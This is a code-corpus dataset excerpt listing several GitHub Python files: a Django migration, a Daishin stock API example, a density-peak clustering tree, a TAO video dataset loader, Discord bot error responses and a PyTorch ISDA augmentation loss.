max_stars_repo_path
stringlengths 3
269
| max_stars_repo_name
stringlengths 4
119
| max_stars_count
int64 0
191k
| id
stringlengths 1
7
| content
stringlengths 6
1.05M
| score
float64 0.23
5.13
| int_score
int64 0
5
|
---|---|---|---|---|---|---|
project1/budget/migrations/0005_delete_hiddenstatus_budget.py | sujeethiremath/Project-1 | 0 | 5000 | # Generated by Django 2.2.5 on 2020-04-08 00:08
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('budget', '0004_auto_20200407_2356'),
]
operations = [
migrations.DeleteModel(
name='HiddenStatus_Budget',
),
]
| 1.140625 | 1 |
tutorial/43.py | mssung94/daishin-trading-system | 2 | 5001 | # 대신증권 API
# 데이터 요청 방법 2가지 BlockRequest 와 Request 방식 비교 예제
# 플러스 API 에서 데이터를 요청하는 방법은 크게 2가지가 있습니다
#
# BlockRequest 방식 - 가장 간단하게 데이터 요청해서 수신 가능
# Request 호출 후 Received 이벤트로 수신 받기
#
# 아래는 위 2가지를 비교할 수 있도록 만든 예제 코드입니다
# 일반적인 데이터 요청에는 BlockRequest 방식이 가장 간단합니다
# 다만, BlockRequest 함수 내에서도 동일 하게 메시지펌핑을 하고 있어 해당 통신이 마치기 전에 실시간 시세를 수신 받거나
# 다른 이벤트에 의해 재귀 호출 되는 문제가 있을 경우 함수 호출이 실패할 수 있습니다
# 복잡한 실시간 시세 수신 중에 통신을 해야 하는 경우에는 Request 방식을 이용해야 합니다.
import pythoncom
from PyQt5.QtWidgets import *
import win32com.client
import win32event
g_objCodeMgr = win32com.client.Dispatch('CpUtil.CpCodeMgr')
StopEvent = win32event.CreateEvent(None, 0, 0, None)
class CpEvent:
def set_params(self, client, name, caller):
self.client = client # CP 실시간 통신 object
self.name = name # 서비스가 다른 이벤트를 구분하기 위한 이름
self.caller = caller # callback 을 위해 보관
def OnReceived(self):
# 실시간 처리 - 현재가 주문 체결
if self.name == 'stockmst':
print('recieved')
win32event.SetEvent(StopEvent)
return
class CpCurReply:
def __init__(self, objEvent):
self.name = "stockmst"
self.obj = objEvent
def Subscribe(self):
handler = win32com.client.WithEvents(self.obj, CpEvent)
handler.set_params(self.obj, self.name, None)
def MessagePump(timeout):
waitables = [StopEvent]
while 1:
rc = win32event.MsgWaitForMultipleObjects(
waitables,
0, # Wait for all = false, so it waits for anyone
timeout, # (or win32event.INFINITE)
win32event.QS_ALLEVENTS) # Accepts all input
if rc == win32event.WAIT_OBJECT_0:
# Our first event listed, the StopEvent, was triggered, so we must exit
print('stop event')
break
elif rc == win32event.WAIT_OBJECT_0 + len(waitables):
# A windows message is waiting - take care of it. (Don't ask me
# why a WAIT_OBJECT_MSG isn't defined < WAIT_OBJECT_0...!).
# This message-serving MUST be done for COM, DDE, and other
# Windowsy things to work properly!
print('pump')
if pythoncom.PumpWaitingMessages():
break # we received a wm_quit message
elif rc == win32event.WAIT_TIMEOUT:
print('timeout')
return
pass
else:
print('exception')
raise RuntimeError("unexpected win32wait return value")
code = 'A005930'
##############################################################
# 1. BlockRequest
print('#####################################')
objStockMst = win32com.client.Dispatch("DsCbo1.StockMst")
objStockMst.SetInputValue(0, code)
objStockMst.BlockRequest()
print('BlockRequest 로 수신 받은 데이터')
item = {}
item['종목명'] = g_objCodeMgr.CodeToName(code)
item['현재가'] = objStockMst.GetHeaderValue(11) # 종가
item['대비'] = objStockMst.GetHeaderValue(12) # 전일대비
print(item)
print('')
##############################################################
# 2. Request ==> 메시지 펌프 ==> OnReceived 이벤트 수신
print('#####################################')
objReply = CpCurReply(objStockMst)
objReply.Subscribe()
code = 'A005930'
objStockMst.SetInputValue(0, code)
objStockMst.Request()
MessagePump(10000)
item = {}
item['종목명'] = g_objCodeMgr.CodeToName(code)
item['현재가'] = objStockMst.GetHeaderValue(11) # 종가
item['대비'] = objStockMst.GetHeaderValue(12) # 전일대비
print(item)
| 2.21875 | 2 |
ADPTC_LIB/DPTree_ST.py | SuilandCoder/ADPTC_LIB | 0 | 5002 | <filename>ADPTC_LIB/DPTree_ST.py<gh_stars>0
#%%
import numpy as np
import copy
import matplotlib.pyplot as plt
import time
def split_cluster_new(tree,local_density,dc_eps,closest_denser_nodes_id,mixin_near_matrix):
'''
dc_eps: density_connectivity 阈值
使用父子节点的直接距离,与子节点与兄弟节点的连通距离进行聚簇划分;
使用平均密度划分outlier
返回:
outlier_forest
cluster_forest
'''
mean_density = np.mean(local_density)
outlier_forest = {}
cluster_forest = {}
uncertain_forest = {}
not_direct_reach = []
#* 计算不可直接可达的点:
for k in range(len(closest_denser_nodes_id)):
near_nodes = mixin_near_matrix[k]
if closest_denser_nodes_id[k] not in near_nodes:
not_direct_reach.append(k)
pass
not_direct_reach = np.array(not_direct_reach)
# not_direct_reach = np.where(closest_dis_denser>eps)[0]
#* 将不直接距离可达的点按层次排列:
# not_direct_reach = np.array(not_direct_reach)
depth_list_not_direct_reach= np.zeros(len(not_direct_reach),dtype=np.int16)
for i in range(len(not_direct_reach)):
# depth_list_not_direct_reach[i] = tree.node_dir[not_direct_reach[i]].getLvl()
depth_list_not_direct_reach[i] = tree.calcu_depth(not_direct_reach[i],0)
pass
not_direct_reach = list(not_direct_reach[np.argsort(depth_list_not_direct_reach)])
#* 模拟栈结构,层次深的先处理
start = time.clock()
while(len(not_direct_reach)>0):
#* 判断是否 连通:距离小于阈值,并且密度要大于子树的平均密度
node_id = not_direct_reach.pop()
if(node_id==129193 or node_id==61589 or node_id == 123593):
print(node_id)
if node_id in tree.sorted_gamma_index[0:10]:
cluster_forest[node_id] = tree.remove_subtree(node_id)
continue
node = tree.node_dir[node_id]
parent_id = node.parent_id
parent_node = tree.node_dir[parent_id]
children = parent_node.getChildren()
siblings_reliable = [ i for i in children if i not in not_direct_reach] #* 求得兄弟节点,其中兄弟节点不能是不直接可达的点
not_reliable_nodes = [i for i in children if i not in siblings_reliable]
if node_id in not_reliable_nodes:
not_reliable_nodes.remove(node_id)
if node_id in siblings_reliable:
siblings_reliable.remove(node_id)
pairs_nodes = is_connected_new(tree,local_density,dc_eps,node_id,siblings_reliable,not_reliable_nodes,mixin_near_matrix)
if len(pairs_nodes)==0:
if(node_id==tree.root_node.node_id):
continue
if(local_density[node_id]-mean_density*dc_eps)>=0:
#* 获取子节点个数:
offspring_id = tree.get_subtree_offspring_id(node_id,[node_id])
if(len(offspring_id)<local_density[node_id]):
uncertain_forest[node_id] = tree.remove_subtree(node_id)
pass
else:
cluster_forest[node_id] = tree.remove_subtree(node_id)
pass
pass
else:
outlier_forest[node_id] = tree.remove_subtree(node_id)
pass
pass
pass
end = time.clock()
print('切割树耗时 %s' % str(end - start))
cluster_forest[tree.root_node.node_id] = tree #* 添加根节点的树
return outlier_forest, cluster_forest, uncertain_forest
def is_connected_new(tree,local_density,dc_eps,cur_node_id,reliable_nodes,not_reliable_nodes,mixin_near_matrix):
'''
cur_node: 当前待判断与父节点连通度的点;
reliable_nodes:兄弟节点中与父节点直接相连的点;
not_reliable_nodes:兄弟节点中不与父节点直接相连的点,但可能间接相连;
连通度判断方案:
1. 判断 cur_node 与 reliable_nodes 是否可达,是则返回;没有则执行2;
2. 判断 cur_node 与 not_reliable_nodes(假设为[a,b,c,d,e]) 是否可达,若与[a,b,c]可达,与[d,e]不可达,执行3;
3. 循环遍历[a,b,c],递归调用本方法 is_connected_entropy(……,cur_node_id=[a],reliable_nodes,not_reliable_nodes=[b,c,d,e])
'''
#* 1.
if(len(reliable_nodes)==0):
return []
for reliable_node_id in reliable_nodes:
pairs_nodes, connected_nodes = tree.calcu_neighbor_btw_subtree(cur_node_id,reliable_node_id,mixin_near_matrix)
if(len(pairs_nodes)==0):
continue
# return pairs_nodes
cur_node_offspring = tree.get_subtree_offspring_id(cur_node_id,[cur_node_id])
local_density_cur_offspring = np.mean(local_density[cur_node_offspring])
local_density_connected_nodes = np.mean(local_density[connected_nodes])
if(local_density_connected_nodes>local_density_cur_offspring*dc_eps):
return pairs_nodes
pass
#* 2.
for i in range(len(not_reliable_nodes)):
pairs_nodes, connected_nodes = tree.calcu_neighbor_btw_subtree(cur_node_id,not_reliable_nodes[i],mixin_near_matrix)
if(len(pairs_nodes)==0):
pairs_nodes = is_connected_new(tree,local_density,dc_eps,not_reliable_nodes[i],reliable_nodes,not_reliable_nodes[i+1:],mixin_near_matrix)
if(len(pairs_nodes)>0):
return pairs_nodes
else:
cur_node_offspring = tree.get_subtree_offspring_id(cur_node_id,[cur_node_id])
local_density_cur_offspring = np.mean(local_density[cur_node_offspring])
local_density_connected_nodes = np.mean(local_density[connected_nodes])
if(local_density_connected_nodes>local_density_cur_offspring*dc_eps):
return pairs_nodes
# return pairs_nodes
# #* 连通点平均密度大于局部密度阈值,则更新最大相似度
cur_node_offspring = tree.get_subtree_offspring_id(cur_node_id,[cur_node_id])
local_density_cur_offspring = np.mean(local_density[cur_node_offspring])
local_density_connected_nodes = np.mean(local_density[connected_nodes])
if(local_density_connected_nodes>local_density_cur_offspring*dc_eps):
return pairs_nodes
if(len(pairs_nodes)==0):
pairs_nodes = is_connected_new(tree,local_density,dc_eps,not_reliable_nodes[i],reliable_nodes,not_reliable_nodes[i+1:],mixin_near_matrix)
if(len(pairs_nodes)>0):
return pairs_nodes
# pass
return []
def label_these_node_new(outlier_forest,cluster_forest,node_num,uncertain_forest,mixin_near_matrix):
'''
给森林中的样本点贴标签
考虑不确定点的分配
'''
labels = np.full((node_num),-1,dtype=np.int32)
for outlier_id in outlier_forest:
outlier_tree = outlier_forest[outlier_id]
outlier_idlist = outlier_tree.get_subtree_offspring_id(outlier_id,[outlier_id])
labels[outlier_idlist] = -1
pass
label = 0
for tree_id in cluster_forest:
cluster_tree = cluster_forest[tree_id]
cluster_idlist = cluster_tree.get_subtree_offspring_id(tree_id,[tree_id])
labels[cluster_idlist] = label
label = label + 1
pass
#todo 修改此处代码
for uncertain_tree_id in uncertain_forest:
uncertain_tree = uncertain_forest[uncertain_tree_id]
uncertain_nodes_id = uncertain_tree.get_subtree_offspring_id(uncertain_tree_id,[uncertain_tree_id])
all_near_nodes = np.array([],dtype=np.int32)
for node_id in uncertain_nodes_id:
all_near_nodes = np.append(all_near_nodes,mixin_near_matrix[node_id])
pass
# all_near_nodes = mixin_near_matrix[uncertain_nodes_id]
all_near_nodes = np.unique(all_near_nodes)
all_near_nodes = all_near_nodes[np.where(labels[all_near_nodes]!=-1)]
unique_labels,counts=np.unique(labels[all_near_nodes],return_counts=True)
if(len(counts)==0):
cur_label = -1
else:
cur_label = unique_labels[np.argmax(counts)]
labels[uncertain_nodes_id]=cur_label
pass
core_points = cluster_forest.keys()
return labels,core_points
'''
密度峰值树;
根据cfsfdp算法生成的局部密度、高密度最近邻距离、决策指标来生成 DPTree;
'''
class Node():
def __init__(self,node_id,attr_list,parent_id=None,dist_to_parent=None,density=None,gamma=None,children=[]):
self.node_id = node_id
self.attr_list = attr_list
self.parent_id = parent_id
self.dist_to_parent = dist_to_parent
self.density = density
self.children = children
self.gamma = gamma
self.offspring_num = None
self.lvl = None
def addChild(self,child):
self.children+=[child]
def removeChild(self,child):
self.children.remove(child)
def resetChildren(self):
self.children = []
def setParentId(self,parent_id):
self.parent_id = parent_id
def setOffspringNum(self,num):
self.offspring_num = num
def setLvl(self,lvl):
self.lvl = lvl
def getAttr(self):
return self.attr_list
def getNodeId(self):
return self.node_id
def getParentId(self):
return self.parent_id
def getDistToParent(self):
return self.dist_to_parent
def getDensity(self):
return self.density
def getGamma(self):
return self.gamma
def getChildren(self):
return self.children
def hasChildren(self,child_id):
if child_id in self.children:
return True
else:
return False
def getOffspringNum(self):
return self.offspring_num
def getLvl(self):
return self.lvl
class DPTree():
def __init__(self):
self.node_count = 0
self.node_dir = {}
self.root_node = None
self.node_offspring = {}
self.sorted_gamma_index = None
pass
def createTree(self,X,sorted_gamma_index,closest_node_id,closest_dis_denser,local_density,gamma):
#* 根据 gamma 顺序新建节点
node_dir = {}
node_created = np.zeros(len(sorted_gamma_index))
self.sorted_gamma_index = sorted_gamma_index
for i in range(len(sorted_gamma_index)):
node_id = sorted_gamma_index[i]
parent_id = closest_node_id[node_id] #* closest_node_id是根据排序后的gamma获得的
attr_list = X[node_id]
dist_to_parent = closest_dis_denser[node_id]
density = local_density[node_id]
if(node_created[node_id]==0):
node = Node(node_id,attr_list,parent_id,dist_to_parent=dist_to_parent,density=density,gamma[node_id],children=[])
node_created[node_id] = 1
node_dir[node_id] = node
node_dir[node_id].setParentId(parent_id)
if(node_created[parent_id]==0):
parent_node = Node(parent_id,X[parent_id],parent_id=None,dist_to_parent=closest_dis_denser[parent_id],density=local_density[parent_id],gamma=gamma[parent_id],children=[])
node_created[parent_id] = 1
node_dir[parent_id] = parent_node
parent_node = node_dir[parent_id]
cur_node = node_dir[node_id]
if(node_id != parent_id):#* 非根节点
parent_node.addChild(node_id)
# parent_lvl = parent_node.getLvl()
# cur_node.setLvl(parent_lvl+1)
else:
if(parent_node.getLvl()==None):
parent_node.setLvl(0)
#* 设置节点层次信息
# for i in tree.node_dir:
# pass
self.root_node = node_dir[sorted_gamma_index[0]]
self.node_dir = node_dir
self.node_count = len(sorted_gamma_index)
pass
def printTree2(self,parent_id,spaceStr=''):
for node_id in self.node_dir:
if(node_id==self.root_node.node_id):
continue
node = self.node_dir[node_id]
if(node.parent_id==parent_id):
print(spaceStr, node.node_id, sep = '')
self.printTree2(node.node_id,spaceStr+' ')
pass
def calcu_subtree_offspring_num(self,node_id):
node = self.node_dir[node_id]
cur_offsprings = node.getOffspringNum()
if(cur_offsprings!=None):
return cur_offsprings
child_num = len(node.children)
if(child_num==0):
return 0
for i in node.children:
cur_offsprings = self.calcu_subtree_offspring_num(i)
child_num+=cur_offsprings
node.setOffspringNum(child_num)
return child_num
def get_subtree_offspring_id(self,node_id,other_idlist):
'''
获取所有子孙的node_id
考虑:是否需要存储在node属性中。
'''
def fn_get_subtree_offspring_id(node_id,offspring_idlist):
if(node_id in self.node_offspring.keys()):
return self.node_offspring[node_id]
else:
node = self.node_dir[node_id]
children = node.getChildren()
child_num = len(children)
if(child_num==0):
self.node_offspring[node_id] = offspring_idlist
return offspring_idlist
offspring_idlist= list(offspring_idlist) + children
for i in children:
child_offspring_idlist = fn_get_subtree_offspring_id(i,[])
self.node_offspring[i] = child_offspring_idlist
offspring_idlist= list(offspring_idlist) + child_offspring_idlist
pass
self.node_offspring[node_id] = offspring_idlist
return offspring_idlist
offspring_idlist = fn_get_subtree_offspring_id(node_id,[])
return np.array(list(offspring_idlist) + other_idlist)
def calcu_subtree_entropy(self,offspring_id,local_density,closest_dis_denser):
p_sum = np.sum(local_density[offspring_id]/closest_dis_denser[offspring_id])
p = (local_density[offspring_id]/closest_dis_denser[offspring_id])/p_sum
entropy = -1*np.sum(p*np.log2(p))
#* 只有一个点的情况返回 0
if(entropy==0):
return 0
return entropy/(-1*np.log2(1/(len(offspring_id))))
def remove_subtree(self,child_id):
'''
删除 node_id 节点的子树:child_id, 被删除的子树形成新的树并返回
1. 更新 self.node_dir, self.node_count
2. 更新 node_id 节点的 children[], 以及所有父级offspring_num
3. 生成新树
'''
# print("删除子节点:",child_id)
offspring_id = self.get_subtree_offspring_id(child_id,[child_id])
offspring_len = len(offspring_id)
node_id = self.node_dir[child_id].parent_id
node = self.node_dir[node_id]
node.removeChild(child_id)
self.node_count = self.node_count-offspring_len
#* 删除存储的子孙节点
if(node_id in self.node_offspring.keys()):
for node_to_delete in offspring_id:
self.node_offspring[node_id].remove(node_to_delete)
print("删除子孙节点:",node_to_delete)
pass
pass
# cur_id = child_id
# parent_id = node_id
# #* 设置父级 offspring_num:
# while(cur_id!=parent_id):
# parent_node = self.node_dir[parent_id]
# if(parent_node.getOffspringNum()!=None):
# parent_node.setOffspringNum(parent_node.getOffspringNum()-offspring_len)
# cur_id = parent_id
# parent_id = parent_node.parent_id
# pass
#* 更新 self.node_dir, 生成新树:
new_tree = DPTree()
for i in offspring_id:
removed_node = self.node_dir.pop(i)
new_tree.node_dir[i] = removed_node
pass
new_tree.node_count = offspring_len
new_tree.root_node = new_tree.node_dir[child_id]
new_tree.root_node.setParentId(child_id)
return new_tree
def calcu_dist_betw_subtree(self,node_id_one,node_id_two,dist_mat,eps):
'''
计算两个子树间的连通距离
return:
1. 最短距离
2. 小于距离阈值的点集
'''
connected_nodes = np.array([],dtype=np.int32)
offspring_one = self.get_subtree_offspring_id(node_id_one,[node_id_one])
offspring_two = self.get_subtree_offspring_id(node_id_two,[node_id_two])
dist = float('inf')
for i in offspring_two:
tmp_dist = np.min(dist_mat[i][offspring_one])
if(tmp_dist<dist):
dist = tmp_dist
pass
connected_nodes_index = np.where(dist_mat[i][offspring_one]<eps)[0]
if len(connected_nodes_index)>0:
connected_nodes = np.r_[[i],connected_nodes,offspring_one[connected_nodes_index]]
pass
return dist, np.unique(connected_nodes)
def calcu_neighbor_btw_subtree(self,node_id_one,node_id_two,mixin_near_matrix):
'''
计算两个子树间的邻近点
return:
邻近的点对
所有邻近点
'''
connected_nodes = np.array([],dtype=np.int32)
offspring_one = self.get_subtree_offspring_id(node_id_one,[node_id_one])
offspring_two = self.get_subtree_offspring_id(node_id_two,[node_id_two])
pairs_nodes = []
for i in offspring_two:
connected_nodes_index = np.intersect1d(mixin_near_matrix[i],offspring_one)
if len(connected_nodes_index)>0:
for j in connected_nodes_index:
pairs_nodes.append([i,j])
pass
pass
if(len(pairs_nodes)==0):
return pairs_nodes,connected_nodes
return np.array(pairs_nodes), np.unique(np.array(pairs_nodes).flatten())
def calcu_dist_betw_subtree_entropy(self,node_id_one,node_id_two,dist_mat,eps):
'''
计算两个子树间的连通距离
return:
1. 最大相似距离
2. 大于相似距离阈值的点集
'''
connected_nodes = np.array([],dtype=np.int32)
offspring_one = self.get_subtree_offspring_id(node_id_one,[node_id_one])
offspring_two = self.get_subtree_offspring_id(node_id_two,[node_id_two])
dist = -1
for i in offspring_two:
tmp_dist = np.max(dist_mat[i][offspring_one])
if(tmp_dist>=dist):
dist = tmp_dist
pass
connected_nodes_index = np.where(dist_mat[i][offspring_one]>=eps)[0]
if len(connected_nodes_index)>0:
connected_nodes = np.r_[[i],connected_nodes,offspring_one[connected_nodes_index]]
pass
return dist, np.unique(connected_nodes)
def calcu_depth(self,node_id, depth):
node = self.node_dir[node_id]
parent_id = node.parent_id
if(node_id==parent_id):
return depth
else:
return self.calcu_depth(parent_id,depth+1)
| 2.375 | 2 |
datasets/tao/tao.py | Nik-V9/AirObject | 9 | 5003 | <reponame>Nik-V9/AirObject
from __future__ import print_function
import sys
sys.path.append('.')
import os
from typing import Optional, Union
import cv2
import numpy as np
import PIL.Image as Image
import pickle
import torch
from torch.utils import data
__all__ = ["TAO"]
class TAO(data.Dataset):
r"""A torch Dataset for loading in `the TAO VOS dataset <https://www.vision.rwth-aachen.de/page/taovos/>`_. Will fetch sequences of
rgb images, instance segmentation labels, SuperPoint features (optional).
Example of sequence creation from frames with `seqlen=4`, `dilation=1`, `stride=3`, and `start=2`:
.. code-block::
sequence0
┎───────────────┲───────────────┲───────────────┒
| | | |
frame0 frame1 frame2 frame3 frame4 frame5 frame6 frame7 frame8 frame9 frame10 frame11 ...
| | | |
└───────────────┵───────────────┵────────────────┚
sequence1
Args:
basedir (str): Path to the base directory containing the directories from TAO.
videos (str or tuple of str): Videos to use from sequences (used for creating train/val/test splits). Can
be path to a `.txt` file where each line is a Video Seqeunce name, a tuple of scene names.
seqlen (int): Number of frames to use for each sequence of frames. Default: 4
dilation (int or None): Number of (original video's) frames to skip between two consecutive
frames in the extracted sequence. See above example if unsure.
If None, will set `dilation = 0`. Default: None
stride (int or None): Number of frames between the first frames of two consecutive extracted sequences.
See above example if unsure. If None, will set `stride = seqlen * (dilation + 1)`
(non-overlapping sequences). Default: None
start (int or None): Index of the frame from which to start extracting sequences for every video.
If None, will start from the first frame. Default: None
end (int): Index of the frame at which to stop extracting sequences for every video.
If None, will continue extracting frames until the end of the video. Default: None
height (int): Spatial height to resize frames to. Default: 480
width (int): Spatial width to resize frames to. Default: 640
return_seg (bool): Determines whether to return instance segmentation labels. Default: True
return_points (bool): Determines whether to return SuperPoint Features. Default: False
return_videonames (bool): Determines whether to return videonames for the sequences. Default: False
"""
def __init__(
self,
basedir: str,
videos: Union[tuple, str, None],
seqlen: int = 4,
dilation: Optional[int] = None,
stride: Optional[int] = None,
start: Optional[int] = None,
end: Optional[int] = None,
height: int = 480,
width: int = 640,
*,
return_img: bool = True,
return_seg: bool = True,
return_points: bool = False,
return_videonames: bool = False,
):
super(TAO, self).__init__()
self.basedir = os.path.normpath(basedir)
if not os.path.isdir(self.basedir):
raise ValueError("Base Directory: {} doesn't exist".format(basedir))
self.height = height
self.width = width
self.return_img = return_img
self.return_seg = return_seg
self.return_points = return_points
self.return_videonames = return_videonames
if not isinstance(seqlen, int):
raise TypeError("seqlen must be int. Got {0}.".format(type(seqlen)))
if not (isinstance(stride, int) or stride is None):
raise TypeError("stride must be int or None. Got {0}.".format(type(stride)))
if not (isinstance(dilation, int) or dilation is None):
raise TypeError(
"dilation must be int or None. Got {0}.".format(type(dilation))
)
dilation = dilation if dilation is not None else 0
stride = stride if stride is not None else seqlen * (dilation + 1)
self.seqlen = seqlen
self.stride = stride
self.dilation = dilation
if seqlen < 0:
raise ValueError("seqlen must be positive. Got {0}.".format(seqlen))
if dilation < 0:
raise ValueError('"dilation" must be positive. Got {0}.'.format(dilation))
if stride < 0:
raise ValueError("stride must be positive. Got {0}.".format(stride))
if not (isinstance(start, int) or start is None):
raise TypeError("start must be int or None. Got {0}.".format(type(start)))
if not (isinstance(end, int) or end is None):
raise TypeError("end must be int or None. Got {0}.".format(type(end)))
start = start if start is not None else 0
self.start = start
self.end = end
if start < 0:
raise ValueError("start must be positive. Got {0}.".format(stride))
if not (end is None or end > start):
raise ValueError(
"end ({0}) must be None or greater than start ({1})".format(end, start)
)
# videos should be a tuple
if isinstance(videos, str):
if os.path.isfile(videos):
with open(videos, "r") as f:
videos = tuple(f.read().split("\n"))
else:
raise ValueError("incorrect filename: {} doesn't exist".format(videos))
elif not (isinstance(videos, tuple)):
msg = "videos should either be path to split.txt or tuple of videos, but was of type %r instead"
raise TypeError(msg % type(videos))
self.RGB_data = []
self.Seg_data = []
self.Points_data = []
self.Videonames_data = []
idx = np.arange(self.seqlen) * (self.dilation + 1)
rgbdir = os.path.join(self.basedir, 'JPEGImages/')
pointsdir = os.path.join(self.basedir, 'points/')
segdir = os.path.join(self.basedir, 'Annotations/')
for video in videos:
file_names = [f for f in sorted(os.listdir(os.path.join(rgbdir, video))) if f.endswith('.jpg')]
rgb_list = [os.path.join(os.path.join(rgbdir, video), x) for x in file_names]
if self.return_points:
points_list = [os.path.join(os.path.join(pointsdir, video), x.replace('.jpg','.pkl')) for x in file_names]
if self.return_seg:
seg_list = [os.path.join(os.path.join(segdir, video), x.replace('.jpg','.png')) for x in file_names]
video_len = len(rgb_list)
for start_index in range(self.start, video_len, self.stride):
if start_index + idx[-1] >= video_len:
break
inds = start_index + idx
self.RGB_data.append([rgb_list[ind] for ind in inds])
if self.return_seg:
self.Seg_data.append([seg_list[ind] for ind in inds])
if self.return_points:
self.Points_data.append([points_list[ind] for ind in inds])
if self.return_videonames:
self.Videonames_data.append(video)
self.num_sequences = len(self.RGB_data)
def __len__(self):
r"""Returns the length of the dataset. """
return self.num_sequences
def __getitem__(self, idx: int):
r"""Returns the data from the sequence at index idx.
Returns:
color_seq (torch.Tensor): Sequence of grayscale rgb images of each frame
seg_seq (torch.Tensor): Sequence of instance segmentation labels for objects present in the frames
points_seq (torch.Tensor): Sequence of SuperPoint Features
videoname (str): Videoname of Sequence
Shape:
- color_seq: :math:`(L, 3, H, W)` where `L` denotes sequence length
- seg_seq: : "math: List of per frame instance segmentations with length `L`
- points_seq: "math: List of SuperPoint Features with length `L`
"""
# Read in the color info.
if self.return_img:
color_seq_path = self.RGB_data[idx]
if self.return_seg:
seg_seq_path = self.Seg_data[idx]
if self.return_points:
points_seq_path = self.Points_data[idx]
color_seq, seg_seq, points_seq = [], [], []
for i in range(self.seqlen):
if self.return_img:
image = cv2.imread(color_seq_path[i])
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
image = torch.from_numpy(image).type(torch.float16)
image = image.permute(2,0,1)
image /= 255
color_seq.append(image)
if self.return_seg:
instance_img = np.array(Image.open(seg_seq_path[i]))
obj_ids = np.unique(instance_img)
obj_ids = obj_ids[~np.isin(obj_ids, [0])]
frame_ann = []
for obj_id in obj_ids:
ann = {}
ann['obj_id'] = obj_id
ann_mask = np.isin(instance_img, obj_id).astype(int)
ann['ann_mask'] = ann_mask
frame_ann.append(ann)
seg_seq.append(frame_ann)
if self.return_points:
with open(points_seq_path[i],'rb') as fp:
points = pickle.load(fp)
points_seq.append(points)
output = []
if self.return_img:
color_seq = torch.stack(color_seq, 0).float()
output.append(color_seq)
if self.return_seg:
output.append(seg_seq)
if self.return_points:
output.append(points_seq)
if self.return_videonames:
output.append(self.Videonames_data[idx])
return tuple(output) | 2.609375 | 3 |
Platforms/Web/Processing/Api/Discord/Configs/Quotedisabledchannels/errors.py | The-CJ/Phaazebot | 2 | 5004 | from typing import TYPE_CHECKING
if TYPE_CHECKING:
from Platforms.Web.main_web import PhaazebotWeb
import json
from aiohttp.web import Response
from Utils.Classes.extendedrequest import ExtendedRequest
async def apiDiscordConfigsQuoteDisabledChannelExists(cls:"PhaazebotWeb", WebRequest:ExtendedRequest, **kwargs) -> Response:
"""
Optional keywords:
------------------
* msg `str` : (Default: None) * [Overwrites default]
* channel_id `str` *
* channel_name `str` *
Default message (*gets altered by optional keywords):
----------------------------------------------------
Disabled quote channel already exists
"""
res:dict = dict(status=400, error="discord_disabled_regularchannel_exists")
channel_id:str = kwargs.get("channel_id", "")
if channel_id:
res["channel_id"] = str(channel_id)
channel_name:str = kwargs.get("channel_name", "")
if channel_name:
res["channel_name"] = str(channel_name)
# build message
default_msg:str = "Disabled quote channel already exists"
if channel_name:
default_msg += f" for '{channel_name}'"
if channel_id:
default_msg += f" (Channel ID:{channel_id})"
msg:str = kwargs.get("msg", default_msg)
res["msg"] = msg
cls.BASE.Logger.debug(f"(API/Discord) 400 Channel exists: {WebRequest.path}", require="api:400")
return cls.response(
text=json.dumps(res),
content_type="application/json",
status=400
)
async def apiDiscordConfigsQuoteDisabledChannelNotExists(cls:"PhaazebotWeb", WebRequest:ExtendedRequest, **kwargs) -> Response:
"""
Optional keywords:
------------------
* msg `str` : (Default: None) * [Overwrites default]
* channel_id `str` *
* channel_name `str` *
Default message (*gets altered by optional keywords):
----------------------------------------------------
Disabled quote channel does not exists
"""
res:dict = dict(status=400, error="discord_disabled_regularchannel_not_exists")
channel_id:str = kwargs.get("channel_id", "")
if channel_id:
res["channel_id"] = str(channel_id)
channel_name:str = kwargs.get("channel_name", "")
if channel_name:
res["channel_name"] = str(channel_name)
# build message
default_msg:str = "Disabled quote channel does not exists"
if channel_name:
default_msg += f" for '{channel_name}'"
if channel_id:
default_msg += f" (Channel ID:{channel_id})"
msg:str = kwargs.get("msg", default_msg)
res["msg"] = msg
cls.BASE.Logger.debug(f"(API/Discord) 400 Channel does not exists: {WebRequest.path}", require="api:400")
return cls.response(
text=json.dumps(res),
content_type="application/json",
status=400
)
| 2.4375 | 2 |
augmentation/ISDA.py | RichardScottOZ/sota-data-augmentation-and-optimizers | 31 | 5005 | import torch
import torch.nn as nn
class EstimatorCV():
def __init__(self, feature_num, class_num):
super(EstimatorCV, self).__init__()
self.class_num = class_num
self.CoVariance = torch.zeros(class_num, feature_num, feature_num)#.cuda()
self.Ave = torch.zeros(class_num, feature_num)#.cuda()
self.Amount = torch.zeros(class_num)#.cuda()
def update_CV(self, features, labels):
N = features.size(0)
C = self.class_num
A = features.size(1)
NxCxFeatures = features.view(
N, 1, A
).expand(
N, C, A
)
onehot = torch.zeros(N, C)#.cuda()
onehot.scatter_(1, labels.view(-1, 1), 1)
NxCxA_onehot = onehot.view(N, C, 1).expand(N, C, A)
features_by_sort = NxCxFeatures.mul(NxCxA_onehot)
Amount_CxA = NxCxA_onehot.sum(0)
Amount_CxA[Amount_CxA == 0] = 1
ave_CxA = features_by_sort.sum(0) / Amount_CxA
var_temp = features_by_sort - \
ave_CxA.expand(N, C, A).mul(NxCxA_onehot)
var_temp = torch.bmm(
var_temp.permute(1, 2, 0),
var_temp.permute(1, 0, 2)
).div(Amount_CxA.view(C, A, 1).expand(C, A, A))
sum_weight_CV = onehot.sum(0).view(C, 1, 1).expand(C, A, A)
sum_weight_AV = onehot.sum(0).view(C, 1).expand(C, A)
weight_CV = sum_weight_CV.div(
sum_weight_CV + self.Amount.view(C, 1, 1).expand(C, A, A)
)
weight_CV[weight_CV != weight_CV] = 0
weight_AV = sum_weight_AV.div(
sum_weight_AV + self.Amount.view(C, 1).expand(C, A)
)
weight_AV[weight_AV != weight_AV] = 0
additional_CV = weight_CV.mul(1 - weight_CV).mul(
torch.bmm(
(self.Ave - ave_CxA).view(C, A, 1),
(self.Ave - ave_CxA).view(C, 1, A)
)
)
self.CoVariance = (self.CoVariance.mul(1 - weight_CV) + var_temp
.mul(weight_CV)).detach() + additional_CV.detach()
self.Ave = (self.Ave.mul(1 - weight_AV) + ave_CxA.mul(weight_AV)).detach()
self.Amount += onehot.sum(0)
class ISDALoss(nn.Module):
def __init__(self, feature_num, class_num):
super(ISDALoss, self).__init__()
self.estimator = EstimatorCV(feature_num, class_num)
self.class_num = class_num
self.cross_entropy = nn.CrossEntropyLoss()
def isda_aug(self, fc, features, y, labels, cv_matrix, ratio):
N = features.size(0)
C = self.class_num
A = features.size(1)
weight_m = list(fc.parameters())[0]
NxW_ij = weight_m.expand(N, C, A)
